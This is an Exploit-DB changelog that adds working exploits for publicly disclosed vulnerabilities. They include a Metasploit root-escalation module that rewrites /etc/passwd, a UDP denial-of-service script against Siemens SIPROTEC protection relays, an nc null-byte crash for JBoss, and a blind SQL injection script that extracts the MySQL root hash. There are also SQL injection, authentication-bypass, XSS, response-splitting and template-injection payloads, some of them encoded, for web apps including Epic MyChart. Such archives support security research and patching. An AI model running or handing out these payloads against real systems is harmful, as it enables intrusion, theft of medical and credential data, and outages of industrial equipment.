DB: 2018-02-17

45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting

exploits/asp/webapps/44098.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Epic Systems Corporation MyChart SQL Injection
+# Google Dork: MyChart® licensed from Epic Systems Corporation
+# Date: 8/19/16
+# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
+# Vendor Homepage: https://www.epic.com/software
+# Software Link: N/A
+# Version: N/A
+# Tested on: Windows/Unix
+# CVE : CVE-2016-6272
+
+Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
+
+The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
+
+EPIC was quick to respond to contact and patch the vulnerability in MyChart.
+
+Below are two proof of concepts:
+
+Proof of concept 1:
+
+https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)
+
+https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)
+
+Proof of concept 2 (operations):
+
+https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE
+
+https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)
+
+https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE

exploits/hardware/dos/44103.py

@@ -0,0 +1,31 @@
+# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
+# Date: 14.02.2018
+# Exploit Author: M. Can Kurnaz
+# Contact: https://twitter.com/0x43414e
+# Vendor Homepage: https://www.siemens.com
+# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
+# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
+# CVE : CVE-2015-5374
+# Vulnerability Details: 
+# https://www.cvedetails.com/cve/CVE-2015-5374/
+# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
+
+#!/usr/bin/env python
+
+import socket
+import sys
+
+print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')
+
+if len(sys.argv) < 2:
+	print('Usage: ' + sys.argv[0] + ' [target]')
+	sys.exit(1)
+
+print('Sending packet to ' + sys.argv[1] + ' ...')
+
+payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) 
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(payload, (sys.argv[1], 50000))
+
+print('Done, say goodbye!')

exploits/linux/local/44097.rb

@@ -0,0 +1,240 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ABRT raceabrt Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Fedora systems with
+        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+        as the crash handler.
+
+        A race condition allows local users to change ownership of arbitrary
+        files (CVE-2015-3315). This module uses a symlink attack on
+        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
+        then adds a new user with UID=0 GID=0 to gain root privileges.
+        Winning the race could take a few minutes.
+
+        This module has been tested successfully on ABRT packaged version
+        2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop
+        19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.
+
+        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Tavis Ormandy', # Discovery and C exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'DisclosureDate' => 'Apr 14 2015',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          [ 'CVE', '2015-3315' ],
+          [ 'EDB', '36747' ],
+          [ 'BID', '75117' ],
+          [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],
+          [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],
+          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],
+          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],
+          [ 'URL', 'https://access.redhat.com/articles/1415483' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]
+        ]
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
+        OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def check
+    if cmd_exec('lsattr /etc/passwd').include? 'i'
+      vprint_error 'File /etc/passwd is immutable'
+      return CheckCode::Safe
+    end
+
+    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
+      vprint_error 'System is NOT configured to use ABRT for crash reporting'
+      return CheckCode::Safe
+    end
+    vprint_good 'System is configured to use ABRT for crash reporting'
+
+    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
+      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
+      return CheckCode::Safe
+    end
+    vprint_good 'System does not appear to have been patched'
+
+    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
+      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
+      return CheckCode::Safe
+    end
+    vprint_good "Directory '/var/tmp/abrt' exists"
+
+    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+      vprint_error 'abrt-ccp service NOT running'
+      return CheckCode::Safe
+    end
+    vprint_good 'abrt-ccpp service is running'
+
+    abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1]
+    unless abrt_version.blank?
+      vprint_status "System is using ABRT package version #{abrt_version}"
+    end
+
+    CheckCode::Detected
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    cmd_exec "chmod +x '#{path}'"
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    if check != CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    @chown_file = '/etc/passwd'
+
+    if datastore['USERNAME'].blank?
+      @username = rand_text_alpha rand(7..10)
+    else
+      @username = datastore['USERNAME']
+    end
+
+    # Upload Tavis Ormandy's raceabrt exploit:
+    # - https://www.exploit-db.com/exploits/36747/
+    # Cross-compiled with:
+    # - i486-linux-musl-cc -static raceabrt.c
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'
+    fd = ::File.open path, 'rb'
+    executable_data = fd.read fd.stat.size
+    fd.close
+
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    upload_and_chmodx executable_path, executable_data
+
+    # Change working directory to base_dir
+    cmd_exec "cd '#{base_dir}'"
+
+    # Launch raceabrt executable
+    print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
+    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+
+    # Check if we own /etc/passwd
+    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
+      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
+    end
+
+    print_good "Success! '#{@chown_file}' is writable"
+
+    # Add new user with no password
+    print_status "Adding #{@username} user to #{@chown_file} ..."
+    cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}"
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Execute payload executable
+    vprint_status 'Executing payload...'
+    cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\""
+  end
+
+  def on_new_session(session)
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+    end
+
+    # Reinstate /etc/passwd root ownership and remove new user
+    root_owns_passwd = false
+    new_user_removed = false
+
+    if session.type.to_s.eql? 'meterpreter'
+      # Reinstate /etc/passwd root ownership
+      session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
+
+      # Remove new user
+      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
+
+      # Wait for clean up
+      Rex.sleep 5
+
+      # Check root ownership
+      passwd_stat = session.fs.file.stat(@chown_file).stathash
+      if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
+        root_owns_passwd = true
+      end
+
+      # Check for new user in /etc/passwd
+      passwd_contents = session.fs.file.open(@chown_file).read.to_s
+      unless passwd_contents.include? "#{@username}:"
+        new_user_removed = true
+      end
+    elsif session.type.to_s.eql? 'shell'
+      # Reinstate /etc/passwd root ownership
+      session.shell_command_token "chown root:root #{@chown_file}"
+
+      # Remove new user
+      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
+
+      # Check root ownership
+      passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
+      if passwd_owner.to_s.include? 'root'
+        root_owns_passwd = true
+      end
+
+      # Check for new user in /etc/passwd
+      passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
+      unless passwd_user.to_s.include? "#{@username}:"
+        new_user_removed = true
+      end
+    end
+
+    unless root_owns_passwd
+      print_warning "Could not reinstate root ownership of #{@chown_file}"
+    end
+
+    unless new_user_removed
+      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+    end
+  rescue => e
+    print_error "Error during cleanup: #{e.message}"
+  ensure
+    super
+  end
+end

exploits/multiple/dos/44099.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)
+
+# Date: 14-02-2018
+
+# Exploit Author: Frank Spierings
+
+# Vendor Homepage:
+https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started
+
+# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/
+
+# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19
+
+# Tested on: Red Hat Enterprise Linux Server release 7.4 |
+
+# CVE : CVE-2018-1041
+
+
+
+This is a very easy Denial of Service exploit. The target only requires 4
+null bytes: `\x00\x00\x00\x00`.
+
+The CPU will instantly spike after receiving this payload.
+
+
+
+printf "\x00\x00\x00\x00" | nc <target> <port = 4447|9999>
+
+`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`

exploits/multiple/webapps/44141.txt

@@ -0,0 +1,75 @@
+# Exploit Title: Oracle Primavera P6 Enterprise Project Portfolio Management HTTP Response Splitting
+# Date: 16-02-2018
+# Exploit Author: Marios Nicolaides - RUNESEC
+# Reviewers: Simon Loizides and Nicolas Markitanis - RUNESEC
+# Vendor Homepage: https://www.oracle.com
+# Affected Software: Oracle Primavera P6 Enterprise Project Portfolio Management 8.3, 8.4, 15.1, 15.2, 16.1
+# Tested on: Oracle Primavera P6 Enterprise Project Portfolio Management (Build: 15.1.0.0 (B0163) 14.03.2015.1305) / Oracle WebLogic 12.1.3.0.0
+# CVE: CVE-2017-10046	
+# Category: Web Application
+
+Overview
+--------
+
+The Oracle Primavera Project Portfolio Management application is vulnerable to HTTP 
+Response Splitting.
+
+The application takes the user's input from the languageCode parameter and includes
+it in the ORA-PWEB_LANGUAGE_1111 cookie value within the "Set-Cookie" HTTP Response
+header. The application allows an attacker to inject LF (line feed) characters and
+break out of the headers into the message body and write arbitrary content into the
+application's response.
+
+As a result, this could enable an attacker to perform Cross-Site Scripting attacks
+(XSS), redirect victims to malicious websites, and poison web and browser caches.
+
+
+Details
+-------
+
+The exploit can be demonstrated as follows:
+    1. A malicious attacker crafts the following URL:
+        /p6/LoginHandler?languageCode=runesec%0a%0a%0a<script>alert(document.cookie)</script>%0a
+    2. The attacker sends the above URL to an Oracle Primavera Project Portfolio Management application user.
+    3. The "malicious" JavaScript payload will execute in the victim's browser and display a popup box showing the victim's cookies.
+
+Please note that the payload used above is for demonstration purposes only. A real attacker would try to steal the user's cookies
+or perform other malicious actions.
+
+The above exploit was tested against the following components:
+    Application: Oracle Primavera (Build: 15.1.0.0 (B0163) 14.03.2015.1305)
+    Underlying Infrastructure: Oracle WebLogic 12.1.3.0.0
+
+
+Impact
+------
+
+An attacker might be able to steal the user's session cookie and/or credentials.
+As a result, the attacker would be able to gain unauthorized access to the application.
+Further, an attacker might be able to poison web and/or browser caches in an attempt
+to perform a persistent attack.
+
+
+Mitigation
+----------
+
+Apply Critical Patch Update (CPU) of July 2017 - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
+
+
+References
+----------
+https://blog.runesec.com/2018/02/15/oracle-primavera-http-response-splitting/
+http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
+https://www.cvedetails.com/cve/CVE-2017-10046/
+https://nvd.nist.gov/vuln/detail/CVE-2017-10046
+https://www.owasp.org/index.php/HTTP_Response_Splitting
+https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
+http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting
+
+
+Timeline
+--------
+
+24 April 2017 - Oracle informed about the issue
+July 2017 - Oracle released a patch
+15 February 2018 - Exploit publicly disclosed

exploits/php/webapps/44100.txt

@@ -0,0 +1,19 @@
+# Exploit Title: TV - Video Subscription - Authentication Bypass
+# Dork: N/A
+# Date: 2018-02-14
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
+# Version: All version
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# With this exploit,attacker can login as any user without any
+authentication.
+# # # # #
+# Proof of Concept :
+
+1) Go to login page .
+
+2) Username : anything@anything.anything
+    Password : ' or 0=0 #

exploits/php/webapps/44101.py

@@ -0,0 +1,93 @@
+#!/usr/env/python
+"""
+Application UserSpice PHP user management
+Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit
+URL https://userspice.com
+Date 1.2.2018
+Author Dolev Farhi
+
+About the App:
+What makes userspice different from almost any other PHP User Management
+Framework is that it has been designed from the
+beginning to get out of your way so you can spend your time working on
+your project
+
+About the vulnerability:
+Unsanitized input passed to removePermission parameter.
+"""
+
+import requests
+import string
+import sys
+
+from bs4 import BeautifulSoup
+
+userspice_host = '10.0.0.16'
+userspice_user = 'admin'
+userspice_pass = 'password'
+userspice_login_url = 'http://%s//users/login.php' % userspice_host
+userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' %
+userspice_host
+guess_chars = string.ascii_lowercase + string.ascii_uppercase +
+string.digits + string.punctuation
+
+
+banner = """
+-------------------------------------------------------
+| userSpice <= 4.3 Blind SQL Injection Vulnerability" |
+-------------------------------------------------------
+"""
+
+login_data = {
+'dest':'',
+'username':userspice_user,
+'password':userspice_pass
+}
+
+payload = {
+'process':'1',
+'removePermission[]':'1',
+'private':'Yes',
+'changeTitle':''
+}
+
+s = requests.session()
+
+def getCSRF(url):
+req = s.get(url).text
+soup = BeautifulSoup(req, "lxml")
+csrf = soup.find('input', {"name" : "csrf"})
+csrf_token = csrf['value']
+return csrf_token
+
+login_data_csrf = getCSRF(userspice_login_url)
+login_data['csrf'] = login_data_csrf
+req = s.post(userspice_login_url, data=login_data)
+
+if 'login failed' in req.text.lower():
+print('Login failed, check username/password')
+sys.exit(1)
+
+payload_data_csrf = getCSRF(userspice_vuln_url)
+payload['csrf'] = payload_data_csrf
+print(banner)
+print('[+] Running...')
+print('[+] Obtaining MySQL root hash... this may take some time.')
+password = ""
+for i in range(0, 61):
+for c in guess_chars:
+payload_data_csrf = getCSRF(userspice_vuln_url)
+payload['csrf'] = payload_data_csrf
+injection = "5); SELECT 1 UNION SELECT IF(BINARY
+SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) Password
+FROM mysql.user WHERE User = 'root'#;".format(i, c)
+payload['removePermission[]'] = injection
+req = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()
+if float(req) 0.6:
+password += c
+print('[+] %s' % password)
+else:
+pass
+
+print('done')
+sys.exit(0)

exploits/php/webapps/44102.txt

@@ -0,0 +1,22 @@
+Vulnerability details:
+# Exploit Title: Twig <2.4.4 Server side template injection 
+# Date: 02/15/2018
+# Exploit Author: JameelNabbo
+# Author website: www.jameelnabbo.com
+# Vendor Homepage: https://twig.symfony.com 
+# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
+# Version: < 2.4.4
+# Tested on: MAC OSX
+
+1.Description:
+Twig is a modern php template engine  which compile templates down to plain optimized PHP code, Twig <2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string", depends on the vulnerable application, which takes deferent params by GET or POST.
+
+Example: by injecting this in a search param  http://localhost/search?search_key={{4*4}} <http://localhost/search?search_key=%7B%7B4*4%7D%7D>         Output: 16
+
+
+2. POC:
+http://localhost/search?search_key={{4*4}} 
+OUTPUT: 4 
+
+http://localhost/search?search_key={{ls}} 
+OUTPUT: list of files/directories etc….

exploits/php/webapps/44104.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Joomla! Component SIGE version <= 3.2.3 Cross-site Scripting
+# Date: 15-02-2018
+# Software Link: https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.2.3.zip
+# Exploit Author: Alwin Peppels
+# Website: www.onvio.nl
+# CVE: CVE-2017-16356
+# Category: webapps
+
+1. Description
+Kubik-Rubik Simple Image Gallery Extended (SIGE) contains an XSS in the
+'print.php' file.
+Insufficient sanitization of the 'caption' URL parameter allows injection
+of Javascript into the page.
+In versions <= 3.2.0 the 'name' and 'img' parameters are vulnerable as well.
+Google dork: inurl:plugin_sige/print.php
+
+The version of the SIGE plugin can be determined with this file:
+[JOOMLA]/plugins/content/sige/sige.xml
+
+2. Proof of Concept
+
+
+ [JOOMLA]/plugins/content/sige/plugin_sige/print.php?img=x&caption=<img%20src=x%20onerror=alert(%27XSS%27)>
+
+3. Solution:
+
+Update to version 3.3.0
+https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.3.0.zip

exploits/php/webapps/44105.txt

@@ -0,0 +1,26 @@
+# # # # 
+# Exploit Title: Joomla! Component Advertisement Board 3.1.0 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://ordasoft.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
+# Version: 3.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5982
+# # # # 
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=[SQL]
+# 
+# YWFhJyBPUiAoU0VMRUNUIDYwMDQgRlJPTShTRUxFQ1QgQ09VTlQoKiksQ09OQ0FUKEBAdmVyc2lvbiwoU0VMRUNUIChFTFQoNjAwND02MDA0LDEpKSksMHg3ZTdlN2UsZGF0YWJhc2UoKSxGTE9PUihSQU5EKDApKjIpKXggRlJPTSBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyBHUk9VUCBCWSB4KWEpLS0gSHRMQg==
+# 
+# # # #
+
+Joomla! Component Advertisement Board v3.0.4
+id parameter,v3.0.4 previously found.
+https://www.exploit-db.com/exploits/41600/

exploits/php/webapps/44106.txt

@@ -0,0 +1,30 @@
+# # # #
+# Exploit Title: Joomla! Component Aist <= 2.0 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://aist.bmstu.ru/
+# Software Link: http://aist.bmstu.ru/
+# Version: <= 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5993
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_aist&view=showvacancy&id=[SQL]
+#  
+# JTJkJTMxJTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTMxJTM0JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJjJTMyJTMwJTJjJTMyJTMxJTJjJTMyJTMyJTJjJTMyJTMzJTJjJTMyJTM0JTJjJTMyJTM1JTJjJTMyJTM2JTJjJTMyJTM3JTJjJTMyJTM4JTJjJTMyJTM5JTJjJTMzJTMwJTJjJTMzJTMxJTJjJTMzJTMyJTJjJTMzJTMzJTJjJTMzJTM0JTJjJTMzJTM1JTJjJTMzJTM2JTJkJTJkJTIwJTJk
+# 
+# # # #
+
+
+
+
+https://kcst.bmstu.ru/forums/index.php?topic=1213.0
+http://aist.bmstu.ru/
+АИСТ выполнена в виде компонента для системы управления контентом CMS Joomla! 1.5. и представляет собой подсистему веб-сайта центра (службы) содействия трудоустройству выпускников или образовательного учреждения.
+AIST is implemented as a component for the content management system CMS Joomla! 1.5. and is a subsystem of the website of the center (service) to promote the employment of graduates or an educational institution.

exploits/php/webapps/44107.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla! Component AllVideos Reloaded 1.2.x - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://allvideos.fritz-elfert.de
+# Software Link: http://joomlacode.org/gf/project/allvideos15/frs/?action=FrsReleaseBrowse&frs_package_id=3564
+# Version: 1.2.x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5990
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=[SQL]
+#  
+# JTJkJTZkJTc5JTcwJTZmJTcwJTc1JTcwJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJkJTJkJTIwJTJk
+# 
+# # # #

exploits/php/webapps/44108.txt

@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component DT Register 3.2.7 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://www.dthdevelopment.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/dt-register/
+# Version: 3.2.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6584
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_dtregister&task=edit&controller=category&id=[SQL]
+# 
